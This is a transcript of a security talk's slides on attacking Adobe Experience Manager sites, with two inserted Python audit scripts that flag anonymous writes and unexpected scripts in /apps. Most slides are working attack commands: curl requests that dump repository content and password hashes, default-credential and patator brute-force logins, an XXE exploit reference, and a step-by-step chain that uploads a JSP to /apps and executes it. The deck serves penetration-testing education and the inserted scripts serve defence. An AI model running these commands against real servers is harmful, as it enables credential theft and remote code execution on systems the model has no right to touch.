Hacking Adobe Experience Manager sites

Upload: mikhail-egorov-oscp-cissp-spse

Post on 28-Jul-2015


TRANSCRIPT

Page 1: Hacking Adobe Experience Manager sites

Hack1ng Adobe Experience Manager sites

Page 2: Who is that guy?

• Mikhail Egorov

• Security researcher

• Works in Odin (Parallels)

• 0ang3el (at) gma1l (d0t) com

Page 3: Related Work

• http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/

• http://www.slideshare.net/CQCON/prsentation-ben-zahler

• https://docs.adobe.com/docs/en/aem/6-0/administer/security/security-checklist.html

Page 4: What do we want

• Sensitive information from JCR

• Installed OSGI bundles

• Custom scripts

• Usernames

• Password hashes

• Elements that allow anonymous modification

Page 5: Sensitive information from JCR

• Use JsonRendererServlet

curl -X "GET" http://127.0.0.1:8080/.json

curl -X "GET" http://127.0.0.1:8080/.6.json

curl -X "GET" http://127.0.0.1:8080/.tidy.6.json

curl -X "GET" http://127.0.0.1:8080/.tidy.infinity.json

Page 6: Installed OSGI bundles

• List of all bundles

• QueryBuilder is your friend! http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html

curl -X "GET" http://127.0.0.1:8080/bin.tidy.infinity.json

curl -X "GET" http://127.0.0.1:8080/bin/querybuilder.json

Page 7: Custom scripts

• List custom scripts

• List compiled custom scripts from the cache

curl -X "GET" http://127.0.0.1:8080/apps.tidy.infinity.json

curl -X "GET" http://127.0.0.1:8080/var/classes.tidy.infinity.json

Page 8: Usernames

• Dump content node properties

• Use a regular expression to extract usernames (pipe with the previous command)

curl -X "GET" http://127.0.0.1:8080/content.infinity.json |
python -c 'import sys,re; print("\n".join(m.group(1) for m in re.finditer("\".+?By\":\"(.+?)\"", sys.stdin.read())))' |
sort -u

Page 9: Password hashes

• Use QueryBuilder bundle

curl -X "GET" "http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=selective&p.properties=rep:principalName%20rep:password&p.limit=100"

Page 10: Anonymous modification

• Dump content node properties

• Use a regular expression to check (pipe with the previous command)

curl -X "GET" http://127.0.0.1:8080/content.infinity.json |
python -c 'import sys,re; m = re.search("\".+?By\":\"anonymous\"", sys.stdin.read()); print("Anon modification:", "Yes" if m else "No")'
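A structured version of the two one-line regex checks on pages 8 and 10, added here as an audit helper and not part of the original deck: it walks a JSON renderer dump of /content, lists every principal recorded in a *By property, and reports nodes that the anonymous user created or modified (evidence of anonymous write access). The tree below is a constructed sample, not output captured from a real instance.

```python
import json
from typing import Iterator, List, Set, Tuple

# Constructed sample of what /content.infinity.json returns for a small tree;
# node names, users and structure are made up for this example.
SAMPLE_TREE = json.loads("""
{
  "jcr:primaryType": "sling:OrderedFolder",
  "jcr:createdBy": "admin",
  "site": {
    "jcr:primaryType": "cq:Page",
    "jcr:createdBy": "admin",
    "jcr:content": {
      "jcr:primaryType": "cq:PageContent",
      "jcr:lastModifiedBy": "author",
      "cq:lastModifiedBy": "author"
    },
    "guestbook": {
      "jcr:primaryType": "nt:unstructured",
      "jcr:createdBy": "anonymous",
      "jcr:lastModifiedBy": "anonymous"
    }
  }
}
""")

def walk_nodes(node: dict, path: str = "/content") -> Iterator[Tuple[str, dict]]:
    """Yield (path, properties) for each node: dict-valued entries are child
    nodes, everything else is a property of the current node."""
    yield path, {k: v for k, v in node.items() if not isinstance(v, dict)}
    for name, value in node.items():
        if isinstance(value, dict):
            yield from walk_nodes(value, f"{path}/{name}")

def collect_principals(tree: dict) -> Set[str]:
    """User ids recorded in any *By property (jcr:createdBy, jcr:lastModifiedBy, ...)."""
    return {v for _, props in walk_nodes(tree)
            for k, v in props.items() if k.endswith("By") and isinstance(v, str)}

def anonymous_writes(tree: dict) -> List[str]:
    """Paths that anonymous created or last modified: a sign that the anonymous
    user holds write permission somewhere under /content."""
    return sorted(p for p, props in walk_nodes(tree)
                  if any(k.endswith("By") and v == "anonymous" for k, v in props.items()))

if __name__ == "__main__":
    print("principals:", sorted(collect_principals(SAMPLE_TREE)))
    print("anonymous writes:", anonymous_writes(SAMPLE_TREE))
```

To run it against a real dump, replace SAMPLE_TREE with json.load() of the saved /content.infinity.json output.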

Page 11: Getting access

• Try default user credentials: admin/admin, author/author, anonymous/anonymous

• Offline attack (brute-force the hashes)

• Online attack (POST servlet bundle)

patator http_fuzz url=http://127.0.0.1:8080/content/fake.json method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt auth_type=basic -x ignore:code!=200 --threads 5

Page 12: You have access, now what?

• XSS

• CSRF

• DoS

• Read local files

• RCE

Not covered, sorry!

Page 13: Webdav bundle, XXE

• CVE-2015-1833 ( http://seclists.org/oss-sec/2015/q2/518 )

• The WebDAV OSGi bundle uses an XML parser that is not properly initialized

• Exploit - https://www.exploit-db.com/exploits/37110/

Page 14: Webdav bundle, XXE

• Out-of-band exploitation: http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html

  • Pros: works with anonymous credentials

  • Cons: you need an external server, unstable

• Inbound exploitation

  • Pros: you do not need an external server, more stable

  • Cons: you need the credentials of a user that is able to modify some node in the JCR

Page 15: Webdav bundle, XXE Demo

http://www.youtube.com/watch?v=Hg3AXoG89Gs

Page 16: Remote code execution

• We have a node: http://127.0.0.1:8080/rce

• We have a script exec.jsp that is magically loaded into the node http://127.0.0.1:8080/apps/rcetype

• When someone navigates to http://127.0.0.1:8080/rce.exec our exec.jsp will be executed.

{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}

{"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}
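The defensive counterpart of this slide, added as an example and not part of the original deck: an audit over an /apps.infinity.json dump that reports script files whose creator is not the account that normally installs code. The dump below is constructed (the rcetype folder from the slide next to a package-installed component), and the trusted account name "deploy-svc" is an assumption to be replaced with the real deployment user.

```python
import json
from typing import Iterator, List, Tuple

# Script types that the Sling resource resolver will execute from /apps
SCRIPT_EXTENSIONS = (".jsp", ".html", ".esp", ".ecma", ".js")

# Constructed /apps.infinity.json excerpt: the rcetype folder shown on the slide
# next to a component folder installed by a deployment account (assumed name).
SAMPLE_APPS = json.loads("""
{
  "jcr:primaryType": "nt:folder",
  "mysite": {
    "jcr:primaryType": "nt:folder",
    "jcr:createdBy": "deploy-svc",
    "components": {
      "jcr:primaryType": "nt:folder",
      "page.jsp": {"jcr:primaryType": "nt:file", "jcr:createdBy": "deploy-svc"}
    }
  },
  "rcetype": {
    "jcr:primaryType": "nt:folder",
    "jcr:createdBy": "admin",
    "jcr:created": "Sun May 03 2015 21:24:38 GMT+0300",
    "exec.jsp": {"jcr:primaryType": "nt:file", "jcr:createdBy": "admin",
                 "jcr:created": "Sun May 03 2015 21:24:38 GMT+0300"}
  }
}
""")

def walk(node: dict, path: str = "/apps") -> Iterator[Tuple[str, dict]]:
    """Yield (path, properties) for every node; dict values are child nodes."""
    yield path, {k: v for k, v in node.items() if not isinstance(v, dict)}
    for name, child in node.items():
        if isinstance(child, dict):
            yield from walk(child, f"{path}/{name}")

def unexpected_scripts(tree: dict, trusted=("deploy-svc",)) -> List[Tuple[str, str, str]]:
    """Script files under /apps not created by a trusted deployment account.
    A script written through the POST servlet by an interactive user (the
    pattern on this slide) is listed with its creator and creation time."""
    hits = []
    for path, props in walk(tree):
        if props.get("jcr:primaryType") == "nt:file" and path.endswith(SCRIPT_EXTENSIONS):
            creator = props.get("jcr:createdBy", "<unknown>")
            if creator not in trusted:
                hits.append((path, creator, props.get("jcr:created", "?")))
    return hits

if __name__ == "__main__":
    for path, who, when in unexpected_scripts(SAMPLE_APPS):
        print(f"{path}: created by {who} at {when}")
```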

Page 17: Remote code execution

• Step I: Create rcetype node

curl -u admin:admin -Fjcr:primaryType=nt:folder http://127.0.0.1:8080/content/rcetype

Page 18: Remote code execution

• Step II: Upload script exec.jsp to rcetype node

curl -u admin:admin -F[email protected] http://127.0.0.1:8080/content/rcetype

Page 19: Remote code execution

• Step III: Copy rcetype to /apps

curl -u admin:admin -F:operation=copy -F:dest=/apps/rcetype http://127.0.0.1:8080/content/rcetype

Page 20: Remote code execution

• Step IV: Create rce node bound to rcetype

curl -u admin:admin -Fsling:resourceType=rcetype http://127.0.0.1:8080/content/rce

Page 21: Remote code execution

• Step V: Launch the JSP script

curl -X "GET" http://127.0.0.1:8080/content/rce.exec

Page 22: Remote code execution, Demo

http://www.youtube.com/watch?v=Z9n2T07e6Ls

Page 23: Ask a Ninja